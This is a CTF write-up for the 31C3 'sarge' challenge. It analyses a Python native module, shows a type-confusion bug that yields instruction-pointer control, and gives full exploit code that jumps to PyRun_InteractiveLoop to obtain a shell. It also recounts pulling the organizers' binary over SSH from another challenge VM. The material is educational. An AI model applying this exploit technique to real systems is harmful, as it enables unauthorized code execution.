31C3 CTF - sarge Writeup
30 January 2015 by sku
Binary analysis
Sarge consists of two files, a Python script server.py and a shared object sarge.so:
#!/usr/bin/env python2
import sarge
import msgpack
import struct

sge = sarge.Sarge(file("./flag").read().strip())

def objecthook(code, data):
    if code == 42:
        return sarge.Sargecmd(data)
    return msgpack.ExtType(code, data)

data = msgpack.unpackb(raw_input(), ext_hook = objecthook)
if sge.authenticate(data["authentication"]):
    data["execute"].run()
else:
    print "Nope"
The file immediately imports the native Python module contained in sarge.so:
$ file sarge.so
sarge.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=3eb654b9ae4dee25a7cd3f52ebed3575f2da8435, not stripped
$ strings -a sarge.so | grep Py
PyTuple_GetItem
PyString_AsString
Py_BuildValue
PyTuple_Size
PyDict_Contains
...
$ nm sarge.so | grep sarge
0000000000000fb0 T initsarge
0000000000000e90 t sarge_authenticate
0000000000000d80 t sargecmd_dealloc
00000000002022c0 d sargecmd_methods
0000000000000d90 t sargecmd_new
0000000000000e00 t sargecmd_run
0000000000202100 d sargecmd_type
0000000000000f90 t sarge_dealloc
00000000002024c0 d sarge_methods
0000000000000e20 t sarge_new
0000000000202300 d sarge_type
As expected from the Python code, we can see that the sarge.Sarge constructor takes one argument (the flag string) and stores it for later use. The user data supplied via raw_input is then used to unpack a message using the msgpack framework. Ignoring the possibility of a bug inside that third-party module for a moment, let's move on to the next point of interest: sarge.Sarge.authenticate, or sarge_authenticate in the binary. A quick glance over the function allows us to summarize the behaviour:
1) Grab the first user argument (which came from data["authentication"]); let's call it arg
2) Treat arg as a Python dict
3) Check if arg contains the key "s3cr3t"
4) Only proceed to 5) if the key is present, otherwise exit
5) Set s = arg["secret"]
6) Compare the secret s to the flag; return True if they are the same, otherwise False
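The behaviour summarized above can be sketched in pure Python. This is only a model of the described control flow, not decompiled code: `authenticate_model` and `KEY` are names made up for illustration, and the sketch assumes that the key checked for and the key looked up are the same one.

```python
KEY = "s3cr3t"  # key name from the summary; assumed to be used for both check and lookup


def authenticate_model(flag, arg):
    """Hypothetical pure-Python model of sarge_authenticate as summarized above."""
    # Treat arg as a dict and bail out if the key is missing.
    # (The native code performs this check with PyDict_Contains.)
    if KEY not in arg:
        return False
    # Fetch the user-supplied secret.
    s = arg[KEY]
    # Compare it to the stored flag.
    return s == flag
```

With a flag of "flag", `authenticate_model("flag", {"s3cr3t": "flag"})` passes, while a wrong secret or a missing key is rejected.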
Since we don't know the flag and don't have time for side-channel attacks, we should consider finding a different attack vector.
You are just not my type
Messing around with the possible data["authentication"] arguments, we can reveal a tiny flaw in the otherwise perfect authentication system: nobody is actually checking the type! The binary happily calls PyDict_Contains on the user-supplied argument, expecting it to be a Python dict. Let's try it with a string instead:
import sarge
data = {"authentication": "AAAAAAAAAAAA\x04\x03\x02\x01\x00\x00\x00\x00"}
sge = sarge.Sarge(file("./flag").read().strip())
sge.authenticate(data["authentication"])
Let's run it:
$ python pwndemo.py
Segmentation fault (core dumped)
Crash, awesome! Inspect the core dump:
$ gdb python core
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x0000000001020304 in ?? ()
gdb-peda$ i stack
#0 0x0000000001020304 in ?? ()
#1 0x00000000004a16b7 in PyDict_Contains ()
#2 0x00007f65fe2e0ee4 in sarge_authenticate
Instruction pointer control, game over!
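A plausible explanation for the 12 bytes of padding, assuming the stock CPython 2.7 object layouts on x86-64 Linux (an assumption, not something verified against the challenge's interpreter): the character data of a string object starts at offset 36, while the dict's ma_lookup function pointer, which PyDict_Contains calls, sits at offset 48. The sketch below models both structs with ctypes to check that arithmetic. `PyStringModel` and `PyDictModel` are illustrative names, not real CPython types.

```python
import ctypes
import struct


class PyStringModel(ctypes.Structure):
    # Assumed layout of a CPython 2.7 PyStringObject on x86-64 Linux.
    _fields_ = [
        ("ob_refcnt", ctypes.c_int64),
        ("ob_type", ctypes.c_uint64),    # pointer, modeled as a 64-bit integer
        ("ob_size", ctypes.c_int64),
        ("ob_shash", ctypes.c_int64),
        ("ob_sstate", ctypes.c_int32),
        ("ob_sval", ctypes.c_char * 1),  # first byte of the string data
    ]


class PyDictModel(ctypes.Structure):
    # Assumed layout of the leading fields of a CPython 2.7 PyDictObject.
    _fields_ = [
        ("ob_refcnt", ctypes.c_int64),
        ("ob_type", ctypes.c_uint64),
        ("ma_fill", ctypes.c_int64),
        ("ma_used", ctypes.c_int64),
        ("ma_mask", ctypes.c_int64),
        ("ma_table", ctypes.c_uint64),
        ("ma_lookup", ctypes.c_uint64),  # function pointer used for lookups
    ]


# Number of string bytes that precede the overlapped function pointer.
padding = PyDictModel.ma_lookup.offset - PyStringModel.ob_sval.offset

# The test string from the crash demo: padding, then 8 little-endian bytes.
payload = b"A" * 12 + b"\x04\x03\x02\x01\x00\x00\x00\x00"
(target,) = struct.unpack("<Q", payload[padding:padding + 8])
print(padding, hex(target))
```

Under these assumptions the computed padding matches the 12 filler bytes, and the decoded pointer matches the faulting address in the backtrace.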
It's not over
Okay, so by providing a string instead of a dict, we can control the instruction pointer, but where do we go from here? I'm quite sure there is an elegant solution to this problem, but I didn't see it immediately. I don't know where system or any other useful function is, and I wouldn't know how to provide proper arguments either.
Ideally, we would want to find something like system("/bin/sh") at a known location. Scanning through my Python binary, I could not find anything of the sort. Then it hit me: find the Python interpreter loop inside the Python binary and jump there!
The interactive python session greets us with the python version and some other information, and then it prints this character sequence: ">>>"
We can find this string once in the binary, and it's being referenced by the function PyRun_InteractiveLoopFlags, which in turn is called by PyRun_InteractiveLoop. Isn't this the greatest thing ever?
.text:000000000046994A
.text:000000000046994A public PyRun_InteractiveLoop
.text:000000000046994A PyRun_InteractiveLoop proc near
.text:000000000046994A xor edx, edx
.text:000000000046994C jmp PyRun_InteractiveLoopFlags
.text:000000000046994C PyR
Your addresses may be different. You know what's even better? Binaries that have not been compiled with position independent code, like uhm.. python on most popular distros!
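As a rough sketch of the first step of that search, the prompt string can be located in a binary with a few lines of Python. `find_all` and `find_in_file` are hypothetical helpers. They return file offsets, not virtual addresses, and finding the function that references the string still takes a disassembler.

```python
def find_all(blob, marker):
    """Return every offset at which marker occurs in blob."""
    offsets = []
    pos = blob.find(marker)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(marker, pos + 1)
    return offsets


def find_in_file(path, marker=b">>> "):
    """Scan a file on disk for the interactive prompt (which ends in a space)."""
    with open(path, "rb") as fh:
        return find_all(fh.read(), marker)
```

For example, `find_in_file("/usr/bin/python2.7")` would list candidate offsets, assuming that path exists on your system.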
Local exploit code
The following exploit gives me an interactive python session after exploiting the type confusion vulnerability:
import msgpack
import sys
import struct
import sarge

def default(obj):
    return obj

def objecthook(code, data):
    if code == 42:
        return sarge.Sargecmd(data)
    return msgpack.ExtType(code, data)

sge = sarge.Sarge(file("./flag").read().strip())
data = {}
loopdiloop = 0x46994A
data["authentication"] = 'a'*12 + struct.pack('<Q', loopdiloop)
m = msgpack.packb(data, default=default)
data = msgpack.unpackb(m, ext_hook = objecthook)
if sge.authenticate(data["authentication"]):
    data["execute"].run()
else:
    print "Nope"
$ python pwn.py
>>> import os;os.system('/bin/sh')
$ echo "winning"
winning
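The payload construction can be pulled out into a small helper, which makes it easy to swap in a different target address. This is a sketch, not part of the original exploit: `build_auth_payload` is a made-up name, and the newline check rests on the fact that server.py reads its input with raw_input(), which stops at the first newline.

```python
import struct


def build_auth_payload(target, padding=12):
    """Hypothetical helper: filler bytes followed by the little-endian target address."""
    payload = b"a" * padding + struct.pack("<Q", target)
    # A newline byte inside the address would end the input line early.
    if b"\n" in payload:
        raise ValueError("payload contains a newline byte")
    return payload
```

`build_auth_payload(0x46994A)` reproduces the authentication string used in the local exploit.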
Remote exploit
One problem remains: finding the address of PyRun_InteractiveLoop in the remote Python binary.
- I wonder if they used the same distro/binaries on all of their challenge VMs
- Let's use the cfy solution to ssh into their cfy VM and pretend to solve cfy2
- scp their Python binary, find PyRun_InteractiveLoop
Yup, 20 points.
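Once the binary is copied over, the address lookup can be scripted. The sketch below parses nm-style text into a dictionary. `parse_nm` is a hypothetical helper, and it assumes the copied binary still exposes the symbol, for example through its dynamic symbol table (nm -D).

```python
def parse_nm(output):
    """Map symbol name -> (address, type letter) from nm-style text."""
    symbols = {}
    for line in output.splitlines():
        parts = line.split()
        # Defined symbols have three columns: address, type, name.
        # Undefined ones (type U) have no address and are skipped.
        if len(parts) != 3:
            continue
        addr, kind, name = parts
        try:
            symbols[name] = (int(addr, 16), kind)
        except ValueError:
            continue
    return symbols
```

Feeding it the nm output and looking up `symbols["PyRun_InteractiveLoop"][0]` would give the value to use for loopdiloop.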
Big thanks to Andi for providing the initial sample code to get %rip control.